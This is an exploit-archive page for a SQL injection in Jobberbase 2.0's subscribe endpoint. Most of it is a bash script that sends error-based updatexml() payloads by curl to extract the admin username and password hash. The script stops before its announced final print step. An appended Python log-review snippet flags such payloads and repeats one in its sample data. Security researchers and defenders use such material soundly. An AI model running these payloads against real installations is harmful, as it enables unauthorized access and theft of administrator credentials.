Jobberbase 2.0 'subscribe' SQL Injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-08-29
Type : webapps
Platform : php
This exploit / vulnerability (Jobberbase 2.0 'subscribe' SQL injection) is for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
# Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (
# Vendor Homepage:
# Version: 2.0
# Tested on: Ubuntu 18.04.1
: '
The page "/subscribe/" is vulnerable to SQL injection.
Simply make a POST request to /subscribe/ with the parameters:
- category=1337<inject_here>
You can use this script to verify if YOUR OWN instance is vulnerable.
$ bash http://localhost/jobberbase/
'
: 'Fetch the username'
USERNAME=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
: 'Ugly way to fetch the password hash'
PASS=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,1,16) from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
WORD=$(curl -s "$1/subscribe/" \
-d "" \
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,17,16) from admin limit 0,1),0x0a),0)-- -" \
-d "" | head -n 3 | tail -n 1 | sed "s/'' in.*//")
: 'Print the user:hash (note: default login is admin:admin)'
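For defenders checking their own logs for this issue, the following is an added example, not part of the original exploit or of the Jobberbase code base. It validates the `category` field of POSTs to /subscribe/ against an integer allow-list and flags the `updatexml(` marker used above. The record layout, the integer-only assumption for category ids, and all function names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Marker taken from the payload on this page (MySQL error-based extraction).
ERROR_BASED_MARKER = re.compile(r"updatexml\s*\(", re.IGNORECASE)
# Assumption: a legitimate category id is a short, unsigned decimal integer.
VALID_CATEGORY = re.compile(r"\d{1,10}")


def classify_category(value):
    """Return 'ok', 'sqli-error-based' or 'invalid' for one category value."""
    if VALID_CATEGORY.fullmatch(value.strip()):
        return "ok"
    if ERROR_BASED_MARKER.search(value):
        return "sqli-error-based"
    return "invalid"


def review_requests(records):
    """Return (client, verdict, value) for each bad category POSTed to /subscribe/.
    A record is (client_ip, method, path, raw form body), an assumed log layout."""
    findings = []
    for client, method, path, body in records:
        if method != "POST" or not path.rstrip("/").endswith("/subscribe"):
            continue
        # parse_qs URL-decodes, so encoded and plain payloads look the same here.
        fields = parse_qs(body, keep_blank_values=True)
        for value in fields.get("category", []):
            verdict = classify_category(value)
            if verdict != "ok":
                findings.append((client, verdict, value))
    return findings


# Constructed sample records (documentation IP ranges, not real traffic).
SAMPLE = [
    ("198.51.100.7", "POST", "/jobberbase/subscribe/", "category=3"),
    ("203.0.113.9", "POST", "/jobberbase/subscribe/",
     "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -"),
    ("203.0.113.9", "POST", "/jobberbase/subscribe/",
     "category=1337+AND+UPDATEXML%280%2C0x0a%2C0%29"),
    ("192.0.2.44", "POST", "/jobberbase/subscribe/", "category=12abc"),
    ("192.0.2.44", "GET", "/jobberbase/jobs/", ""),
]

if __name__ == "__main__":
    for client, verdict, value in review_requests(SAMPLE):
        print(f"{client}\t{verdict}\t{value!r}")
```

The same allow-list check, applied in the application before the value reaches the query (or a parameterized query), removes the injection point; the log review only tells you whether it has been probed.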